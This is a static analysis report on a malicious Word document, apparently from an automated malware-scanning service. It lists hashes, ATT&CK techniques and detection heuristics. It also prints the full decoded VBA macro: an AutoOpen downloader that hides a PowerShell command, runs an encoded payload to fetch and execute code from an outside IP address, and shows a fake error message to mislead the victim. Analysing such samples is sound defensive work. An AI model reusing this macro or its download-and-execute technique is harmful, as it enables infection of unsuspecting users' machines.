Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f64210c12e18e197…

MALICIOUS

Office (OLE)

105.5 KB Created: 2018-06-08 16:03:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: f10fc4dd59a09f8deb6c74cc1962ebf8 SHA-1: 7f5ec4b46d9297aa34b6d3f6e0021b6526902bb0 SHA-256: f64210c12e18e1978a8df1db5237f26c2bd6390b54d8ddd22f881fb477fe89e4
390 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059.001 PowerShell

The sample is a malicious Word document containing VBA macros. The AutoOpen macro attempts to download and execute a second-stage payload using PowerShell. The document body explicitly prompts the user to 'Enable Content', a common lure for macro-based malware. The reconstructed PowerShell command is 'powershell.exe -nop -w hidden -enc', and the download URL is 'http://67.207.92.107:8080/qUWY9smJ1tvq'.

Heuristics 12

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    'powershell.exe'
    Dim lllsdlllfds
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim XZyjLFvJaPn
    Set TQXRzLLjBrHOsmZ = VBA.CreateObject(QyJqxyuJ)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "NewMacros"
    Sub AutoOpen()
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4828 bytes
SHA-256: ba5c07269b9b112fb30748f09be7fe8e1a7d5b89db2f41e1f3c8d021029ce260
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains a PowerShell -EncodedCommand style payload. 45 of 87 identifiers look randomly generated (e.g. 'JABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4A') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()

Dim KNrelrcxK
KNrelrcxK = "JABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAFk" _
& "ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAH" _
& "kAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlA" _
& "G4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6" _
& "AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAFkALgBkAG8AdwB" _
& "uAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANgA3AC4AMgAwADcALgA5ADIALg" _
& "AxADAANwA6ADgAMAA4ADAALwBxAHUAVwBYADkAcwBtAEoAMQB0AHYAYQBHACcAKQA7AA=="
MsgBox KNrelrcxK


Dim sdfg
sdfg = ChrW(83)
Dim lksdjffg
lksdjffg = ChrW(104)
Dim jlkjklkasd
jlkjklkasd = ChrW(101)
Dim llkjdagjkl
llkjdagjkl = ChrW(108)
Dim oAIVppHUqrt
oAIVppHUqrt = sdfg & lksdjffg & jlkjklkasd & llkjdagjkl & llkjdagjkl
MsgBox oAIVppHUqrt

Dim ijasekl
ijasekl = ChrW(87)
Dim krknfgn
krknfgn = ChrW(83)
Dim lljjsjfjd
lljjsjfjd = ChrW(99)
Dim skepfjsld
skepfjsld = ChrW(114)
Dim ljjjsjdhhhfhdf
ljjjsjdhhhfhdf = ChrW(105)
Dim lllsdjjfjjsjdjft
lllsdjjfjjsjdjft = ChrW(112)
Dim ssdjijssdfsd
ssdjijssdfsd = ChrW(116)


Dim GmQkUPfsXCL
GmQkUPfsXCL = ijasekl & krknfgn & lljjsjfjd & skepfjsld & ljjjsjdhhhfhdf & lllsdjjfjjsjdjft & ssdjijssdfsd
MsgBox GmQkUPfsXCL
Dim QyJqxyuJ
QyJqxyuJ = GmQkUPfsXCL & ChrW(46) & oAIVppHUqrt
MsgBox QyJqxyuJ
Dim TQXRzLLjBrHOsmZ
Dim XZyjLFvJaPn
Set TQXRzLLjBrHOsmZ = VBA.CreateObject(QyJqxyuJ)

Dim jklhhshshdhlkh
jklhhshshdhlkh = ChrW(112)
Dim jjjjsjjdjjfj
jjjjsjjdjjfj = ChrW(111)
Dim jjjsjdjjfjsjdjfs
jjjsjdjjfjsjdjfs = ChrW(119)
Dim ssdwefjsdf
ssdwefjsdf = ChrW(101)
Dim hjjhhjhhshdh
hjjhhjhhshdh = ChrW(114)
Dim tttsdfsdf
tttsdfsdf = ChrW(115)
Dim oosoodfs
oosoodfs = ChrW(104)
Dim rrsdrsdfsdf
rrsdrsdfsdf = ChrW(101)
Dim wwwasdfsdfsd
wwwasdfsdfsd = ChrW(108)
Dim iisidifisi
iisidifisi = ChrW(46)
Dim wwsdfsdjkjsdf
wwsdfsdjkjsdf = ChrW(120)

'powershell.exe'
Dim lllsdlllfds
lllsdlllfds = jklhhshshdhlkh & jjjjsjjdjjfj & jjjsjdjjfjsjdjfs & ssdwefjsdf & hjjhhjhhshdh & tttsdfsdf & oosoodfs & rrsdrsdfsdf & wwwasdfsdfsd & wwwasdfsdfsd & iisidifisi & ssdwefjsdf & wwsdfsdjkjsdf & ssdwefjsdf

'-nop'
Dim werwerrew
werwerrew = ChrW(45)
Dim sdfsfdfdddfddasser
sdfsfdfdddfddasser = ChrW(110)
Dim aasesesseesee
aasesesseesee = ChrW(111)
Dim wwwwasdesfsdf
wwwwasdesfsdf = ChrW(112)

Dim hhhsdhkjshdf
hhhsdhkjshdf = werwerrew & sdfsfdfdddfddasser & aasesesseesee & wwwwasdesfsdf

'-w'
Dim iisdifd
iisdifd = ChrW(45)
Dim oosodofosfd
oosodofosfd = ChrW(119)
Dim gdsffsdfsdf
gdsffsdfsdf = iisdifd & oosodofosfd

'hidden'
Dim zzzsdfsdf
zzzsdfsdf = ChrW(104)
Dim ggsdfsdfs
ggsdfsdfs = ChrW(105)
Dim tttrwsdfs
tttrwsdfs = ChrW(100)
Dim yyasdasdd
yyasdasdd = ChrW(101)
Dim ppapsppad
ppapsppad = ChrW(110)

Dim aasddesdgdjkfjlkj
aasddesdgdjkfjlkj = zzzsdfsdf & ggsdfsdfs & tttrwsdfs & tttrwsdfs & yyasdasdd & ppapsppad

'-enc'
Dim ddddsdffsdfsdf
ddddsdffsdfsdf = ChrW(45)
Dim olksdlkfs
olksdlkfs = ChrW(101)
Dim kkkskdkkfdsdf
kkkskdkkfdsdf = ChrW(110)
Dim ooooaosdodasd
ooooaosdodasd = ChrW(99)

Dim gsgsdkjlkjsjdhfsd
gsgsdkjlkjsjdhfsd = ddddsdffsdfsdf & olksdlkfs & kkkskdkkfdsdf & ooooaosdodasd

'powershell.exe -nop -w hidden -enc JABZAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAkAFkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABZAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAkAFkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8ANgA3AC4AMgAwADcALgA5ADIALgAxADAANwA6ADgAMAA4ADAALwBxAHUAVwBYADkAcwBtAEoAMQB0AHYAYQBHACcAKQA7AA==
Dim fWuMTKLhMMiqETp
fWuMTKLhMMiqETp = lllsdlllfds & ChrW(32) & hhhsdhkjshdf & ChrW(32) & gdsffsdfsdf & ChrW(32) & aasddesdgdjkfjlkj & ChrW(32) & gsgsdkjlkjsjdhfsd & ChrW(32) & KNrelrcxK



MsgBox fWuMTKLhMMiqETp
XZyjLFvJaPn = TQXRzLLjBrHOsmZ.Run(fWuMTKLhMMiqETp, 0, False)
Dim title
title = "Microsoft Office Corrupt Application (Compatibility Mode)"
Dim msg
Dim intResponse
msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub